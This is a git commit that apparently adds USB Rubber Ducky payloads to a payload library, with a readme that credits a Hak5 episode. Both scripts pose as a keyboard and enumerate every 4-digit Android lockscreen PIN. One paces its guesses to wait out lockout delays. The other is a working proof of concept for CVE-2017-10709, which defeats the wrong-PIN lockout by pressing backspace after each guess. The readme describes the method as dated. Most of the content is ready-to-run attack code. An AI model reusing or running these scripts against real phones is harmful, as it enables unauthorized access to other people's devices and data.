New Payload - Brute Force

2023-01-01 14:02:38 +00:00 · 2023-01-01 14:02:38 +00:00 · 66251bddc0
parent ae465dae21
commit 66251bddc0
4 changed files with 554 additions and 0 deletions
--- a/payloads/library/mobile/Android/Android_HID_BruteForceCode/BruteForce4.txt
+++ b/payloads/library/mobile/Android/Android_HID_BruteForceCode/BruteForce4.txt
@ -0,0 +1,274 @@
+ATTACKMODE HID
+REM TITLE: Brute Force 
+REM AUTHOR: Cribbit
+REM DESCRIPTION: Updated Version of Hak5 episode 1217.1
+REM VID URL: https://www.youtube.com/watch?v=yoYiEkk5TyI
+REM NOTE: This is 10 year old so will not work with modern android
+REM PROPS: Hak5Darren
+DELAY 3000
+
+EXTENSION TRANSLATE
+    REM VERSION 1.0
+
+    REM This extension acts as a library or collection of helper functions
+    REM to work with converting variables in your payloads.
+    REM WHY:
+    REM Of the many ways to get information about the state of your payload 
+    REM is by injecting static strings effectively as debugging prints
+    REM However, given the non-static nature of payloads using variables in
+    REM DuckyScript 3.0 - the ability to decode variables during payload 
+    REM execution and print (inject) representations of their current state 
+    REM can often be a critically helpful development and debugging tool.
+
+    REM Available Functions:
+    REM TRANSLATE_INT() - var to decimal string - set $INPUT prior to call
+    REM TRANSLATE_HEX() - var to hexidecimal string - set $INPUT prior to call
+    REM TRANSLATE_BINARY() - var to binary string - set $INPUT prior to call
+    REM TRANSLATE_BOOL() - var to boolean string - set $INPUT prior to call
+
+    REM USAGE:
+    REM set $INPUT to desired var
+    REM call the correct translate_ function for the expected data type e.g.
+    REM    VAR $myVar = 1234
+    REM    $INPUT = $myVar
+    REM    TRANSLATE_INT()
+    REM    REM the above code will inject 1234
+
+    REM begin extension variables
+    DEFINE PRINT_INT 0
+    DEFINE PRINT_HEX 1
+    VAR $DIGIT_PRINT_MODE = PRINT_INT
+    VAR $D = 0
+    VAR $IN = 0
+    VAR $INPUT = 0
+    VAR $MOD = 0
+    VAR $P = FALSE
+    VAR $NL = TRUE
+    REM end extension variables
+
+    REM REQUIRED for INT/HEX - convert int to char
+    FUNCTION PRINTDIGIT()
+        IF ($D == 0) THEN
+            STRING 0
+        ELSE IF ($D == 1) THEN
+            STRING 1
+        ELSE IF ($D == 2) THEN
+            STRING 2
+        ELSE IF ($D == 3) THEN
+            STRING 3
+        ELSE IF ($D == 4) THEN
+            STRING 4
+        ELSE IF ($D == 5) THEN
+            STRING 5
+        ELSE IF ($D == 6) THEN
+            STRING 6
+        ELSE IF ($D == 7) THEN
+            STRING 7
+        ELSE IF ($D == 8) THEN
+            STRING 8
+        ELSE IF ($D == 9) THEN
+            STRING 9
+        ELSE IF ($DIGIT_PRINT_MODE == PRINT_HEX) THEN
+            IF ($D == 10) THEN
+                STRING A
+            ELSE IF ($D == 11) THEN
+                STRING B
+            ELSE IF ($D == 12) THEN
+                STRING C
+            ELSE IF ($D == 13) THEN
+                STRING D
+            ELSE IF ($D == 14) THEN
+                STRING E
+            ELSE IF ($D == 15) THEN
+                STRING F
+            END_IF
+        ELSE
+            STRING ?
+        END_IF
+    END_FUNCTION
+
+    REM REQUIRED for INT/HEX- consumes a character / place from the input
+    FUNCTION CONSUME()
+        $D = 0
+        WHILE ($INPUT >= $MOD)
+            $D = ($D + 1)
+            $INPUT = ($INPUT - $MOD)
+        END_WHILE
+        IF (($D > 0) || ($P == TRUE)) THEN
+            $P = TRUE
+            PRINTDIGIT()
+        END_IF
+    END_FUNCTION
+
+    REM ENDIAN SWAPPER helper, (useful for working with VID/PID)
+    FUNCTION SWAP_ENDIAN()
+        $INPUT = ((($INPUT >> 8) & 0x00FF) | (($INPUT << 8) & 0xFF00))
+    END_FUNCTION
+
+    REM Translates a variable of presumed integer type and attempts to convert
+    REM and inject a DECIMAL string representation
+    FUNCTION TRANSLATE_INT() 
+        $DIGIT_PRINT_MODE = PRINT_INT
+        $P = FALSE
+        IF ( $INPUT >= 10000) THEN
+            $MOD = 10000
+            CONSUME()
+        END_IF
+        IF (($INPUT >= 1000) || ($P == TRUE)) THEN
+            $MOD = 1000
+            CONSUME()
+        END_IF
+        IF (($INPUT >= 100) || ($P == TRUE)) THEN
+            $MOD = 100
+            CONSUME()
+        END_IF
+        IF (($INPUT >= 10) || ($P == TRUE)) THEN
+            $MOD = 10
+            CONSUME()
+        END_IF()
+        $D = $INPUT
+        PRINTDIGIT()
+        IF $NL THEN
+            ENTER
+        END_IF
+    END_FUNCTION
+
+    REM Translates a variable of presumed boolean type and attempts to convert
+    REM and inject a BOOLEAN string representation
+    FUNCTION TRANSLATE_BOOL()
+        IF $INPUT THEN
+            STRING TRUE
+        ELSE
+            STRING FALSE
+        END_IF
+        IF $NL THEN
+            ENTER
+        END_IF
+    END_FUNCTION
+
+    REM Translates a variable of presumed integer type and attempts to convert
+    REM and inject a HEX string representation
+    FUNCTION TRANSLATE_HEX()
+        $DIGIT_PRINT_MODE = PRINT_HEX
+        VAR $chars = 0
+        VAR $d1 = 0
+        VAR $d2 = 0
+        VAR $d3 = 0
+        VAR $d4 = 0
+        WHILE ($INPUT > 0)
+            IF ($chars == 0) THEN
+                $d1 = ($INPUT % 16)
+            ELSE IF ($chars == 1) THEN
+                $d2 = ($INPUT % 16)
+            ELSE IF ($chars == 2) THEN
+                $d3 = ($INPUT % 16)
+            ELSE IF ($chars == 3) THEN
+                $d4 = ($INPUT % 16)
+            END_IF
+            $chars = ($chars + 1)
+            $INPUT = ($INPUT / 16)
+        END_WHILE
+        VAR $i = 0
+        STRING 0x
+        IF ($chars == 0) THEN
+            STRING 0x0000
+        ELSE IF ($chars == 1) THEN
+            STRING 000
+            $D = $d1
+            PRINTDIGIT()
+        ELSE IF ($chars == 2) THEN
+            STRING 00
+            $D = $d2
+            PRINTDIGIT()
+            $D = $d1
+            PRINTDIGIT()
+        ELSE IF ($chars == 3) THEN
+            STRING 0
+            $D = $d3
+            PRINTDIGIT()
+            $D = $d2
+            PRINTDIGIT()
+            $D = $d1
+            PRINTDIGIT()
+        ELSE IF ($chars == 4) THEN
+            STRING 0
+            $D = $d4
+            PRINTDIGIT()
+            $D = $d3
+            PRINTDIGIT()
+            $D = $d2
+            PRINTDIGIT()
+            $D = $d1
+            PRINTDIGIT()
+        END_IF
+        IF $NL THEN
+            ENTER
+        END_IF
+    END_FUNCTION
+
+    REM Translates a variable of presumed integer type and attempts to convert
+    REM and inject a BINARY string representation
+    FUNCTION TRANSLATE_BINARY()
+        VAR $I = 16
+        WHILE ( $I > 0 )
+            $I = ($I - 1)
+            IF (($INPUT & 0x8000) == 0 ) THEN
+                STRING 0
+            ELSE
+                STRING 1
+            END_IF
+            $INPUT = ($INPUT << 1)
+        END_WHILE
+        IF $NL THEN
+            ENTER
+        END_IF
+    END_FUNCTION
+END_EXTENSION
+
+REM Turn off TRANSLATE newline
+$NL = FALSE
+VAR $Frist = 0
+VAR $Second = 0
+VAR $Third = 0
+VAR $Forth = 0
+VAR $WaitTime = 30000
+VAR $WaitStep = 5000
+VAR $WaitDiff = 0
+VAR $Cnt = 0
+
+WHILE ($Frist < 10)
+    $Second = 0
+    WHILE ($Second < 10)
+        $Third = 0
+        WHILE ($Third < 10)
+            $Forth = 0
+            WHILE ($Forth < 10)
+                $INPUT = $Frist
+                TRANSLATE_INT()
+                $INPUT = $Second
+                TRANSLATE_INT()
+                $INPUT = $Third
+                TRANSLATE_INT()
+                $INPUT = $Forth
+                TRANSLATE_INT()
+                $Forth = ($Forth + 1)
+                DELAY 1000
+                ENTER
+                ENTER
+                $Cnt = ($Cnt + 1)
+                IF ($Cnt == 5) THEN
+                    $Cnt = 0
+                    WHILE ($WaitDiff < $WaitTime)
+                        DELAY $WaitStep
+                        ENTER
+                        $WaitDiff = ($WaitDiff + $WaitStep)
+                    END_WHILE
+                    $WaitDiff = 0
+                END_IF
+            END_WHILE
+            $Third = ($Third + 1)
+        END_WHILE
+        $Second = ($Second + 1)
+    END_WHILE
+    $Frist = ($Frist + 1)
+END_WHILE
--- a/payloads/library/mobile/Android/Android_HID_BruteForceCode/BruteForce4Backspace.txt
+++ b/payloads/library/mobile/Android/Android_HID_BruteForceCode/BruteForce4Backspace.txt
@ -0,0 +1,259 @@
+ATTACKMODE HID
+REM TITLE: Brute Force 
+REM AUTHOR: Cribbit
+REM DESCRIPTION: POC of CVE-2017-10709 using a Ducky. The lockscreen on Elephone P9000 devices (running Android 6.0) allows physically proximate attackers to bypass a wrong-PIN lockout feature by pressing backspace after each PIN guess.
+REM PROPS: Kalani & Shinichi Kudo
+DELAY 3000
+
+EXTENSION TRANSLATE
+    REM VERSION 1.0
+
+    REM This extension acts as a library or collection of helper functions
+    REM to work with converting variables in your payloads.
+    REM WHY:
+    REM Of the many ways to get information about the state of your payload 
+    REM is by injecting static strings effectively as debugging prints
+    REM However, given the non-static nature of payloads using variables in
+    REM DuckyScript 3.0 - the ability to decode variables during payload 
+    REM execution and print (inject) representations of their current state 
+    REM can often be a critically helpful development and debugging tool.
+
+    REM Available Functions:
+    REM TRANSLATE_INT() - var to decimal string - set $INPUT prior to call
+    REM TRANSLATE_HEX() - var to hexidecimal string - set $INPUT prior to call
+    REM TRANSLATE_BINARY() - var to binary string - set $INPUT prior to call
+    REM TRANSLATE_BOOL() - var to boolean string - set $INPUT prior to call
+
+    REM USAGE:
+    REM set $INPUT to desired var
+    REM call the correct translate_ function for the expected data type e.g.
+    REM    VAR $myVar = 1234
+    REM    $INPUT = $myVar
+    REM    TRANSLATE_INT()
+    REM    REM the above code will inject 1234
+
+    REM begin extension variables
+    DEFINE PRINT_INT 0
+    DEFINE PRINT_HEX 1
+    VAR $DIGIT_PRINT_MODE = PRINT_INT
+    VAR $D = 0
+    VAR $IN = 0
+    VAR $INPUT = 0
+    VAR $MOD = 0
+    VAR $P = FALSE
+    VAR $NL = TRUE
+    REM end extension variables
+
+    REM REQUIRED for INT/HEX - convert int to char
+    FUNCTION PRINTDIGIT()
+        IF ($D == 0) THEN
+            STRING 0
+        ELSE IF ($D == 1) THEN
+            STRING 1
+        ELSE IF ($D == 2) THEN
+            STRING 2
+        ELSE IF ($D == 3) THEN
+            STRING 3
+        ELSE IF ($D == 4) THEN
+            STRING 4
+        ELSE IF ($D == 5) THEN
+            STRING 5
+        ELSE IF ($D == 6) THEN
+            STRING 6
+        ELSE IF ($D == 7) THEN
+            STRING 7
+        ELSE IF ($D == 8) THEN
+            STRING 8
+        ELSE IF ($D == 9) THEN
+            STRING 9
+        ELSE IF ($DIGIT_PRINT_MODE == PRINT_HEX) THEN
+            IF ($D == 10) THEN
+                STRING A
+            ELSE IF ($D == 11) THEN
+                STRING B
+            ELSE IF ($D == 12) THEN
+                STRING C
+            ELSE IF ($D == 13) THEN
+                STRING D
+            ELSE IF ($D == 14) THEN
+                STRING E
+            ELSE IF ($D == 15) THEN
+                STRING F
+            END_IF
+        ELSE
+            STRING ?
+        END_IF
+    END_FUNCTION
+
+    REM REQUIRED for INT/HEX- consumes a character / place from the input
+    FUNCTION CONSUME()
+        $D = 0
+        WHILE ($INPUT >= $MOD)
+            $D = ($D + 1)
+            $INPUT = ($INPUT - $MOD)
+        END_WHILE
+        IF (($D > 0) || ($P == TRUE)) THEN
+            $P = TRUE
+            PRINTDIGIT()
+        END_IF
+    END_FUNCTION
+
+    REM ENDIAN SWAPPER helper, (useful for working with VID/PID)
+    FUNCTION SWAP_ENDIAN()
+        $INPUT = ((($INPUT >> 8) & 0x00FF) | (($INPUT << 8) & 0xFF00))
+    END_FUNCTION
+
+    REM Translates a variable of presumed integer type and attempts to convert
+    REM and inject a DECIMAL string representation
+    FUNCTION TRANSLATE_INT() 
+        $DIGIT_PRINT_MODE = PRINT_INT
+        $P = FALSE
+        IF ( $INPUT >= 10000) THEN
+            $MOD = 10000
+            CONSUME()
+        END_IF
+        IF (($INPUT >= 1000) || ($P == TRUE)) THEN
+            $MOD = 1000
+            CONSUME()
+        END_IF
+        IF (($INPUT >= 100) || ($P == TRUE)) THEN
+            $MOD = 100
+            CONSUME()
+        END_IF
+        IF (($INPUT >= 10) || ($P == TRUE)) THEN
+            $MOD = 10
+            CONSUME()
+        END_IF()
+        $D = $INPUT
+        PRINTDIGIT()
+        IF $NL THEN
+            ENTER
+        END_IF
+    END_FUNCTION
+
+    REM Translates a variable of presumed boolean type and attempts to convert
+    REM and inject a BOOLEAN string representation
+    FUNCTION TRANSLATE_BOOL()
+        IF $INPUT THEN
+            STRING TRUE
+        ELSE
+            STRING FALSE
+        END_IF
+        IF $NL THEN
+            ENTER
+        END_IF
+    END_FUNCTION
+
+    REM Translates a variable of presumed integer type and attempts to convert
+    REM and inject a HEX string representation
+    FUNCTION TRANSLATE_HEX()
+        $DIGIT_PRINT_MODE = PRINT_HEX
+        VAR $chars = 0
+        VAR $d1 = 0
+        VAR $d2 = 0
+        VAR $d3 = 0
+        VAR $d4 = 0
+        WHILE ($INPUT > 0)
+            IF ($chars == 0) THEN
+                $d1 = ($INPUT % 16)
+            ELSE IF ($chars == 1) THEN
+                $d2 = ($INPUT % 16)
+            ELSE IF ($chars == 2) THEN
+                $d3 = ($INPUT % 16)
+            ELSE IF ($chars == 3) THEN
+                $d4 = ($INPUT % 16)
+            END_IF
+            $chars = ($chars + 1)
+            $INPUT = ($INPUT / 16)
+        END_WHILE
+        VAR $i = 0
+        STRING 0x
+        IF ($chars == 0) THEN
+            STRING 0x0000
+        ELSE IF ($chars == 1) THEN
+            STRING 000
+            $D = $d1
+            PRINTDIGIT()
+        ELSE IF ($chars == 2) THEN
+            STRING 00
+            $D = $d2
+            PRINTDIGIT()
+            $D = $d1
+            PRINTDIGIT()
+        ELSE IF ($chars == 3) THEN
+            STRING 0
+            $D = $d3
+            PRINTDIGIT()
+            $D = $d2
+            PRINTDIGIT()
+            $D = $d1
+            PRINTDIGIT()
+        ELSE IF ($chars == 4) THEN
+            STRING 0
+            $D = $d4
+            PRINTDIGIT()
+            $D = $d3
+            PRINTDIGIT()
+            $D = $d2
+            PRINTDIGIT()
+            $D = $d1
+            PRINTDIGIT()
+        END_IF
+        IF $NL THEN
+            ENTER
+        END_IF
+    END_FUNCTION
+
+    REM Translates a variable of presumed integer type and attempts to convert
+    REM and inject a BINARY string representation
+    FUNCTION TRANSLATE_BINARY()
+        VAR $I = 16
+        WHILE ( $I > 0 )
+            $I = ($I - 1)
+            IF (($INPUT & 0x8000) == 0 ) THEN
+                STRING 0
+            ELSE
+                STRING 1
+            END_IF
+            $INPUT = ($INPUT << 1)
+        END_WHILE
+        IF $NL THEN
+            ENTER
+        END_IF
+    END_FUNCTION
+END_EXTENSION
+REM Turn off TRANSLATE newline
+$NL = FALSE
+VAR $Frist = 0
+VAR $Second = 0
+VAR $Third = 0
+VAR $Forth = 0
+
+WHILE ($Frist < 10)
+    $INPUT = $Frist
+    TRANSLATE_INT()
+    $Second = 0
+    WHILE ($Second < 10)
+        $INPUT = $Second
+        TRANSLATE_INT()
+        $Third = 0
+        WHILE ($Third < 10)
+            $INPUT = $Third
+            TRANSLATE_INT()
+            $Forth = 0
+            WHILE ($Forth < 10)
+                $INPUT = $Forth
+                TRANSLATE_INT()
+                $Forth = ($Forth + 1)
+                DELAY 1000
+                BACKSPACE
+            END_WHILE
+            $Third = ($Third + 1)
+            BACKSPACE
+        END_WHILE
+        $Second = ($Second + 1)
+        BACKSPACE
+    END_WHILE
+    $Frist = ($Frist + 1)
+    BACKSPACE
+END_WHILE
--- a/payloads/library/mobile/Android/Android_HID_BruteForceCode/readme.md
+++ b/payloads/library/mobile/Android/Android_HID_BruteForceCode/readme.md
@ -0,0 +1,21 @@
+# Brute Force
+- Author: Cribbit
+- Version: 1.0
+- Target: Android < 6 (I think)
+- Category: Mobile
+- Attackmode: HID
+- Props: *[Hak5Darren](https://github.com/hak5darren)* for original idea, *[Kalani](https://github.com/kalanihelekunihi)* & Shinichi Kudo for info on backspace CVE
+
+## Description
+An updated version of Hak5 episode 1217.1 android pin brute force method using just Ducky Script 3. Please not this brute force method is at least 10-year-old at time of writing. So, will not work on modern android phones. But give you a PoC of a way it could of be written.
+
+There is also a version to work with CVE-2017-10709 that uses backspaces.
+
+Click the image below to watch the original Hak5 Video:  
+[![Hak5 1217.1, Hack any 4-digit Android PIN in 16 hours with a USB Rubber Ducky](https://img.youtube.com/vi/yoYiEkk5TyI/0.jpg)](https://www.youtube.com/watch?v=yoYiEkk5TyI)
+
+## Change Log
+| Version | Changes         |
+| ------- | --------------- |
+| 1.0     | Initial release |
+
--- a/payloads/library/mobile/Android/placeholder
+++ b/payloads/library/mobile/Android/placeholder